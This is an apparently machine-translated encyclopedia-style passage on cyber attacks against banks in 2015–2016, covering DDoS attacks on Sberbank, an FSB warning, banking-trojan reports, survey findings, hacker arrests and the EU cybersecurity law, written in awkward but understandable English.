Besides, the Central Bank is going to enter obligatory double confirmation of the transactions going on  remote channels. By the beginning of December, 2016 most credit institutions in the Russian Federation use for  identification of the client mailing by  the SMS of one-time passwords or  special electronic USB keys and  smart cards.[22]

FSB warned about the preparing cyber attacks to Banks of Russia

On December 2, 2016 the Federal Security Service (FSS) of the Russian Federation announced the forthcoming cyber attacks to the Russian banks for the purpose of destabilization of a national financial system.

FSB of Russia information on preparation by foreign intelligence agencies during the period since December 5, 2016 of large-scale cyber attacks for the purpose of destabilization of a financial system of the Russian Federation, including activity of a number of the largest Russian banks is obtained, says the Russian intelligence agency.

Foreign intelligence agencies prepare cyber attacks to the Russian banks
Foreign intelligence agencies prepare cyber attacks to the Russian banks

On its information, server capacities and the command centers for carrying out cyber attacks are located in the territory of the Netherlands and belong to the Ukrainian hosting company BlazingFast.

Security officers established that the hacker attacks will be followed by bulk mailing of Sms and publications on social networks and blogs of provocative character concerning crisis of a credit and financial system of Russia, bankruptcy and revocation of licenses of a number of the leading banks of federal and regional importance.

The attack is expected several dozens of the cities of Russia, declared in a security service, having added that events for neutralization of threats of economic and information security are held.[23]

The Central Bank reported that the regulator is informed on the preparing cyber attacks to banks and works with intelligence agencies for their suppression.[24]

The BlazingFast company which FSB considers involved in  plans of cyber attacks to  the Russian Federation of  the Netherlands confirmed the information about  clients there and  will check their possible illegal activity. Announced this RIA Novosti in BlazingFast.[25]

We have generally foreign clients. At us few the Russian or Ukrainian clients … Yes, at us is in the Netherlands. Time you called, and this information already somewhere appeared, we now quickly will begin to check all this case — the representative of the company reported the agency. t

DDoS attacks on large Russian banks

On November 9, 2016 Sberbank reflected powerful DDoS attack. In the press service of bank told RIA Novosti about it. Experts say that not only Sberbank was attacked.

The attacks are organized from  the botnets including tens of thousands of the machines geographically distributed over  several tens countries — reported in Sberbank.

DDoS attacks on IT systems of Sberbank were performed during the day, at the same time the power of cyberattacks increased: the first attack was recorded in the morning, the following attack already consisted in the evening of several stages, each of which was twice stronger than previous.

Hackers attacked the largest Russian banks
Hackers attacked the largest Russian banks

Specialists in information security of Sberbank could reveal and localize the attack quickly. In work for clients of bank did not detect failures.

The systems of protection of bank fulfilled reliably, the attack  was quickly detected and localized by divisions of cyber defense of Sberbank  — assured of  the credit institution, largest in Russia.

In addition to Sberbank, powerful DDoS attacks endured some more large Russian banks, specified RIA Novosti in Kaspersky Lab. According to the agency, the attacks were directed to five largest banks from top-10. The fact of the attack was confirmed in Alfa-Bank.

The company reported RIA Novosti that the attack was "rather short-term and weak". An incident did not influence work of business systems of bank in any way, representatives of credit institution assured. What else banks underwent the attacks, is not specified.

The average duration of each DDoS attack on the Russian banks was about an hour, the longest lasted nearly 12 hours. Some banks, according to "Kaspersky Lab, were attacked by cybercriminals repeatedly — series from two to four attacks with a small interval. What else credit institutions were attacked, is not specified.[26]

Trend Micro: Trojans - the main threat of the financial industry

On September 22, 2016 the Trend Micro Incorporated company published the report on information security for the first half of the year 2016 "Time of programs racketeers" (The Reign of Ransomware) according to which data, bank trojans remain one of the most significant threats in the financial industry.

In reporting period increase in activity of a trojan of QAKBOT - multicomponent threat which purpose is mentioned: banking data, information on usual actions of the user, other confidential information. The main complexity in fight against trojans of this kind as QAKBOT is their continuous evolution and emergence of modifications.

Using trojans banks, their corporate clients whose staff executes bank transactions suffer from the attacks, using the devices operating in corporate network. The stolen bank information is used by malefactors for carrying out fraudulent transactions or is on sale on the underground websites for generation of profit. From actions of bank trojans financial institutions sustain losses on compensation of losses which were suffered by their clients as a result of cyber attacks.

The technology capable to protect the system of the user should be complex, the company researcher noted in the report. A system should block threats from the Internet, from harmful files and e-mail. In addition to protection of endpoints, banks should use protocols of two-factor authentication on the websites and to motivate clients to be extremely attentive during the opening of e-mail messages, visit of the websites and loading of files.

24% of the Russian banks are exposed to DDoS attacks

In June, 2016 Qrator Labs and Wallarm (Valarm) Onsek (Onsec) published results of a research of a situation with information security in the financial sector. Poll showed that nearly a quarter of the Russian banks faces DDoS attacks.

For drawing up the report 150 representatives (heads of IT departments, their deputies and also the heads of departments who are responsible for questions of information security) of more than 130 banks and 12 payment systems were polled.

According to results of a research, 24% of the Russian banks in 2015 endured DDoS attacks. Another 21% and 17% of organizations faced a phishing and cracking respectively. 34% of respondents had no problems with information security.

Attempts of cracking of applications 17% of respondents therefore the companies pay more and more attention to protection of the perimeter were recorded. Regularly more than 80% of the companies book security audit.

Experts note that despite  a difficult situation in  economy, banks try to save cybersecurity expenses at  the high level. About a third of respondents increased  the cybersecurity budget in 2015 and  another 44% saved it in  former volume.

Most of survey participants (69%) consider the most effective remedy of counteraction the operator solution on protection against DDoS. However experts of Qrator and Wallarm warn that this method became outdated. Only 9% of respondents consider effective cloud solutions.

The research also showed that in the industry the main risks and effects of incidents of cybersecurity understand: 61% of respondents say that problems with security can lead to a withdrawal of the banking license.

Information security — an important priority for the organizations of the financial sector. The gravity of cyberthreats here adequately is realized that indicates achievement of a certain maturity in questions cybersecurity, researchers reported.

Grouping from 50 hackers is delayed for plunder of 1.7 billion rubles

In June, 2016 mass media with reference to law enforcement agencies reported[27]that hackers by means of the malware stole more than 1.7 billion rubles from accounts of the Russian banks. 50 cybercriminals who acted through the whole country were delayed. Within operation on detention of hackers more than 80 searches in 15 regions of the country are carried out.

The Ministry of Internal Affairs of the Russian Federation together with FSB of Russia delays 50 numerous plunders of money suspected of commission from checking accounts of legal entities and also from correspondent accounts of financial institutions using the malicious software, - the official representative of the Ministry of Internal Affairs of the Russian Federation Irina Volk reported.

She added that as a result of operational actions dummy payment orders on 2.2 billion rubles are blocked. The Center of public relations of FSB told the Interfax agency that as a result of searches the computer equipment, means of communication, bank cards issued on figureheads and also finance documents and considerable cash amounts were withdrawn.

Criminal case under the articles "Establishing a Criminal Organization and Participation in It" and "Fraud in the field of Computer Information" was brought.


Banks in the EU obliged to share information on cyber attacks

On December 8, 2015 it became known that the European officials supported the law, the first for the EU, on regulation of cyber security. It obliges to share the companies data on the attacks to their services. In case of refusal sanctions can be inflicted on them, Reuters reports.

Representatives of the European Commission, the European Parliament and the countries of the European Union after five-hour discussion agreed about adoption of the bill of cyber security. One of requirements is that the companies will have to disclose to the authorities information on the incidents connected with hacker attacks on their computer systems. Otherwise they will be threatened by large penalties.

Europe agreed to adopt the first cyberlaw
Europe agreed to adopt the first cyberlaw

It concerns the organizations and the enterprises representing fields of activity, crucial for the person, including the transport industry, power, the financial sector and health care. Requirements belong also to the Internet companies, such as Google, Amazon and eBay, but do not extend to social networks.

In addition to need to notify on cyber attacks, providing the high level of information protection of the infrastructures will demand from the European business.

According to the vice president of European Commission concerning the uniform digital market of the EU Andrus Ansip, the new legislative directive is directed to increase in consumer confidence to online services, especially international.

"The Internet knows no limit: the problem in one country can easily be thrown on the rest of Europe. For this reason the EU needs global solutions in the field of cyber security. The adopted agreement is an important step in this direction" — Ansip said.

He also noted that in this case it is about the first ever the adopted law regulating questions of cyber security in the territory of the whole Europe. About when new requirements become effective, it is not specified.[28]

Positive Technologies: top trends of cyber attacks in banks in 2015

On October 15, 2015 representatives of Positive Technologies company made a speech at the "Trends of Development of Crimes in the field of High Technologies — 2015" conference.

Among top trends in banking sector experts noted growth of cases of fraud on non-cash transactions (purchases in online stores, etc.) and attacks on processing with we cash the stolen means via ATMs (losses in each of the cases which became known vary from 3 million to 14 million dollars). Also the number of the physical attacks on ATMs grew: from traditional tricks like "the Lebanese loop" to the GreenDispenser viruses allowing hackers to take banknotes from cartridges of ATMs.

According to experts of Positive Technologies, the universal volume of losses in 2014 only on frauds with plastic cards was about 16 billion dollars. At the end of 2015 it is expected that this digit will increase by 25% and will approach 20 billion. It is caused by growth of volume of banking activities, but not good training of criminals. At the same time for the last 20 years of observations the share of cases of fraud in the total amount of transactions practically did not change: swindlers earn about 6 cents from each 100 dollars passing through banks, and this digit changes all on plus or minus a half-cent with preserving of mean value from year to year.

Since 2006, from the moment of implementation of the international standard for bank card transactions with the EMV chip, the volume of the losses coherent with a skimming steadily decreases (theft of data of the card by means of the special reader device — the skimmer). And though the wastage rate is still high, according to the results of the next year experts expect considerable decrease. It is connected with the fact that in October, 2015 the USA on which about two thirds of universal losses are necessary joined universal practice.

2011: Attacks of a trojan of Carberp

Main article: Carberp (trojan)

See Also

Read Also


  1. The Russian hackers switched from the Russian banks to foreign
  2. The two for cyberliteracy: swindlers mastered a new method of theft of data from banks
  3. of an APT attack on the credit and financial sphere in Russia: the overview of tactics and the technician
  4. Swindlers occupied phones
  5. German banks refused support of authorization by the one-time SMS code
  6. of 97% of large banks are vulnerable to cyber attacks
  7. To the staff of large banks prohibited to photograph screens of computers
  8. Police officers across Chuvashia open plunders of money from bank accounts which were made using virus programs
  9. [ to Russians
  10. gave large terms for theft of money from Internet banks]
  11. The State Duma adopted the bill of counteraction to plunders from bank accounts
  12. Six main facts about financial fraud in Russia
  13. carried out the analytical agency TAdviser among 50 largest banks and insurance companies of Russia and the CIS. As experts heads of IT departments, their deputies and also heads from services cybersecurity acted. The agency used a format of telephone interviews. The research was conducted in July — August, 2017.
  14. the research Vmwareissledovaniye VMware, carried out in June, 2017 among 166 respondents from banks with assets not less than 15 billion dollars USA: How Technology Will Shape the Bank of the Future
  15. the Supreme Court of the Russian Federation explained subtleties of qualification of cyberfraud
  16. Kaspersky Lab warned about a new attack to the Russian banks
  17. In Russia learned to steal money from credit cards using Pokemon Go
  18. Cyberswindlers created a new method of thefts of money from cards
  19. Bank Trojans will increase number of the attacks on Android
  20. Russia in 2016 became the leader in number of mobile bank trojans
  21. warned banks about the growing threat of cyber attacks
  22. Overview of financial stability
  23. Foreign intelligence agencies prepare the cyber attacks directed to destabilization of a financial system of Russia
  24. The Central Bank is informed on the preparing cyber attacks to banks, works with intelligence agencies for their suppression
  25. BlazingFast will check clients for participation in preparation of cyber attacks to the Russian Federation
  26. Sberbank reflected powerful DDoS attack
  27. Grouping from 50 hackers is delayed for plunder of 1.7 billion rubles
  28. EU lawmakers, countries agree on bloc's first cyber-security law